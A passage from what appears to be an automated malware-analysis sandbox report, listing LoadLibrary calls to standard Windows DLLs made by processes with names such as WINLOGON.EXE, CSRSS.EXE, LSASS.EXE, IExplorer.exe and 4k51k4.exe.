00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002340)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002340)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005116)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005116)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003924)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005152)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005152)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005476)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005184)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005260)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005260)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005260)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005260)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005260)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005260)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005608)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005608)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005376)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005376)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004192)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004192)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005396)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005396)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005696)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005696)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005696)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005696)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005696)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005696)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003336)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003336)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003160)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003160)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005692)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005692)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004340)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004340)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005748)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005748)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005748)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005748)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005748)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005748)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004240)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004240)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004240)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004240)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004240)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004240)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003700)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003700)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005652)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005652)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005480)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005480)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005040)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005280)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005280)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005280)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005364)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005364)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004108)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004108)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004108)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004108)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004108)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004108)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004332)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004332)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003304)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003304)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002384)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005488)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005488)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005488)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003492)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter 